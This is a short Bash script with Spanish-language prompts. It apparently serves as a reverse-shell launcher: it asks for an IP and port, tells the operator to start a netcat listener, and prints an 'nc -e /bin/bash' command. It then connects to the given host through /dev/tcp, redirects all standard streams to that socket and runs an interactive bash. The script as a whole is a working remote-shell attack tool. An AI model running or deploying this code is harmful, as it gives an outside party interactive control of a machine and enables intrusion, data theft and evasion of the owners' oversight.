#!/bin/bash

ip="$1"
[ -z "$ip" ] && echo "Uso: $0 <IP>" && exit 1

cyan="\033[94m"; mag="\033[95m"; yellow="\033[93m"; green="\033[92m"; red="\033[91m"; reset="\033[0m"

echo -e "${cyan}"
echo -e "_________________________________________________________"
echo -e "${reset}"

echo -e "${mag}Ejecutar: nc -nlvp 1234 en la otra${reset}"

default_port=1234
read -p "$(echo -e ${yellow}¿Default port 1234? [c] para cambiar:${reset} )" change

if [[ "$change" == "c" ]]; then
    read -p "$(echo -e ${yellow}Ingresa el puerto:${reset} )" port
else
    port=$default_port
fi

read -p "$(echo -e ${green}¿Ejecutar sheldon a $ip en el puerto $port? [S/n]:${reset} )" go

if [[ "$go" == "" || "$go" == "s" ]]; then
    echo -e "${cyan}nc -e /bin/bash $ip $port${reset}"
    
    exec 3<>/dev/tcp/$ip/$port
    exec 0<&3
    exec 1>&3
    exec 2>&3
    exec /bin/bash -i
else
    echo -e "${red}Operación cancelada.${reset}"
fi
